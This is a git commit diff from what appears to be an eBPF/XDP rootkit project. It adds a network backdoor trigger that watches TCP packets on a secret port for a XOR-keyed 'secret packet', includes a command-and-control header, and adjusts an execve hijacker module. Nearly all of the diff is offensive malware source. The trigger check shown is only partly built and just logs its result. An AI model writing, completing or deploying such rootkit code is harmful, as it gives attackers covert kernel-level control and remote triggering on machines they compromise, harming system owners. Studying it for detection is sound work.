Included new version of custom lib. Added checks for backdoor triggering

2026-01-18 13:23:08 +08:00 · 2022-05-04 04:40:25 -04:00
parent 25ef3acc5a
commit 073a911f74
21 changed files with 1799 additions and 2124 deletions
--- a/src/ebpf/include/bpf/exec.h
+++ b/src/ebpf/include/bpf/exec.h
@@ -86,7 +86,7 @@ static __always_inline int test_write_user_unique(struct sys_execve_enter_ctx *c

 static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ctx *ctx, __u64 pid_tgid){
    //Check if the exec hijacker is active already
-    if(hijacker_state == 1){
+    if(hijacker_state == 1 || EXEC_HIJACK_ACTIVE_TEMP == 0){
        return 0;
    }
    bpf_printk("Starting execve hijacker\n");
--- a/src/ebpf/include/xdp/backdoor.h
+++ b/src/ebpf/include/xdp/backdoor.h
@@ -0,0 +1,43 @@
+#ifndef __BPF_BACKDOOR
+#define __BPF_BACKDOOR
+
+#include "headervmlinux.h"
+
+#include <bpf/bpf_helpers.h>
+#include "../../common/c&c.h"
+
+static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 payload_size){
+    char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN]; 
+    char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+
+    //Undoing the trigger secret packet to check it is the one expected
+
+    //Loading keys
+    __builtin_memcpy(key1, CC_TRIGGER_SYN_PACKET_KEY_1, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    __builtin_memcpy(key2, CC_TRIGGER_SYN_PACKET_KEY_2, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    __builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+
+    //S1 XOR K1
+    __builtin_memcpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    __builtin_memcpy(section2, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
+        result[ii] = section[ii] ^ section2[ii];
+        if(result[ii]!=key1[ii]){
+            bpf_printk("FAIL\n");
+        }
+    }
+    bpf_printk("Finished V1 check\n");
+
+    return XDP_PASS;
+
+    
+
+
+
+}
+
+#endif
--- a/src/ebpf/include/xdp/xdp_helper.h
+++ b/src/ebpf/include/xdp/xdp_helper.h
@@ -43,8 +43,7 @@ static __always_inline struct expand_return expand_tcp_packet_payload(struct xdp
    __builtin_memcpy(&ip_copy, ip, sizeof(struct iphdr));
    __builtin_memcpy(&tcp_copy, tcp, sizeof(struct tcphdr));

-    if (bpf_xdp_adjust_tail(ctx, (int)(sizeof(char)*more_bytes)) != 0)
-    {
+    if (bpf_xdp_adjust_tail(ctx, (int)(sizeof(char)*more_bytes)) != 0){
        //Failed to expand
        bpf_printk("Failed to expand a tcp packet reserved bytes by %i\n", more_bytes);
        ret.code = -1;//The rest is undefined
--- a/src/ebpf/kit.bpf.c
+++ b/src/ebpf/kit.bpf.c
@@ -26,12 +26,14 @@

 //User-kernel dependencies
 #include "../common/constants.h"
+#include "../common/c&c.h"

 //BPF exclusive includes
 #include "packet/packet_manager.h"
 #include "packet/protocol/tcp_helper.h"
 #include "xdp/xdp_helper.h"
 #include "utils/strings.h"
+#include "xdp/backdoor.h"

 //BPF modules to load
 #include "include/bpf/sched.h"
@@ -53,8 +55,8 @@ SEC("xdp_prog")
 int xdp_receive(struct xdp_md *ctx){
    //bpf_printk("BPF triggered\n");
    
-    void *data_end = (void *)(long)ctx->data_end;
-    void *data = (void *)(long)ctx->data;
+    void *data_end = (void *)(__u32)ctx->data_end;
+    void *data = (void *)(__u32)ctx->data;

    unsigned int payload_size;
    struct ethhdr *eth = data;
@@ -88,18 +90,29 @@ int xdp_receive(struct xdp_md *ctx){

    if (get_tcp_dest_port(tcp) != SECRET_PACKET_DEST_PORT){
        bpf_printk("E %i\n", bpf_ntohs(tcp->dest));
+        bpf_printk("D: %ld, DE:%ld", ctx->data, ctx->data_end);
        return XDP_PASS;
    }
+    bpf_printk("Detected 9000\n");

    payload_size = bpf_ntohs(ip->tot_len) - (tcp->doff * 4) - (ip->ihl * 4);
    payload = (void *)tcp + tcp->doff*4;

-    // We use "size - 1" to account for the final '\0', but depending on the program use
-    if (payload_size != sizeof(SECRET_PACKET_PAYLOAD)-1) {
+    //Check for the rootkit backdoor trigger V1
+    if(payload_size == CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE){
+        if (tcp_payload_bound_check(payload, payload_size, data_end)){
+            bpf_printk("G");
+            return XDP_PASS;
+        }
+        return manage_backdoor_trigger_v1(payload, payload_size);
+    }
+    //Check for the packet modification PoC
+    // We use "size - 1" to account for the final '\0'
+    else if (payload_size != sizeof(SECRET_PACKET_PAYLOAD)-1) {
        bpf_printk("F, PS:%i, P:%i, DE:%i\n", payload_size, payload, data_end);
        return XDP_PASS;
    }
-
+    
    if (tcp_payload_bound_check(payload, payload_size, data_end)){
        bpf_printk("G");
        return XDP_PASS;